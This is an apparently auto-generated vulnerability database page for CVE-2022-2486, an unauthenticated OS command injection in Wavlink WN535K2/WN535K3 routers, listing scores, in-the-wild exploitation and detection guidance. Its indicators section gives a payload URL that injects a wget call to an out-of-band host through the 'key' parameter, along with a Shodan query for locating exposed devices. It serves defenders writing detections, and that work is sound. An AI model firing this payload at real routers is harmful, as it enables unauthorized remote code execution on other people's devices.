cbcvebase.
CVE-2022-2486
published 2022-07-20

CVE-2022-2486: A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file…

PriorityP184critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
26.05%
97.7th percentile
A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used.

Affected

2 ranges
VendorProductVersion rangeFixed in
wavlinkwn535k2
wavlinkwn535k3

Detection & IOCsextracted from sources · hover to see the quote

url/cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27
path/cgi-bin/mesh.cgi?page=upgrade
  • Look for HTTP GET requests to /cgi-bin/mesh.cgi with page=upgrade and a key parameter containing shell metacharacters (e.g., semicolons, quotes, wget commands) indicative of OS command injection attempts.
  • Shodan query 'http.title:"Wi-Fi APP Login"' can be used to identify exposed Wavlink WN535K2/WN535K3 devices on the internet.
  • Successful exploitation results in an HTTP 500 response from the target device; use this status code combined with an out-of-band HTTP interaction (OAST/interactsh) to confirm RCE.
  • Monitor for outbound HTTP requests (wget) originating from Wavlink router processes, which would indicate successful command injection via the key parameter.
  • ·The vulnerability is unauthenticated (PR:N/UI:N), meaning no credentials are required to exploit it. Detection rules should not filter out unauthenticated requests to this endpoint.
  • ·The OAST-based detection template requires an out-of-band interaction server (e.g., interactsh) to confirm exploitation, as the injected command triggers an outbound wget rather than returning output in-band.
  • ·Affected devices are Wavlink WN535K2 and WN535K3 only; scope detection rules to CPE cpe:2.3:h:wavlink:wl-wn535k2 and the associated WN535K3 model.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck8.0HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.